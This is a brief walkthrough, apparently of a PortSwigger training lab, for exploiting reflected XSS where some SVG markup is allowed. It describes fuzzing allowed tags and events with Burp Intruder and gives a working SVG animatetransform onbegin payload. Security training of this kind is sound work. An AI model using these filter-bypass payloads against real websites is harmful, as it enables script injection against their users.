16) Reflected XSS with some SVG markup allowed

Locate possible injection points

As usual the first step is to analyse the application, we have a search functionnality so let's search for random string and then open the developer tools and find where the user input is located in the html

tags are blocked by the application

let's use burp intruder to find all the allowed tags

now let's copy all the tags from the portswigger xss cheat sheet

start attack and click on status to get all the 200 requests

using the portswigger cheat sheet we 've found some xss payloads

but before testing them we have to find allowed events first, using burp intruder again

now let's copy all the events from the portswigger xss cheat sheet

now let's copy all the events from the portswigger xss cheat sheet

now click on start attack

payload :

<svg><animatetransform onbegin=alert(1) attributeName=transform>

and we have solved the lab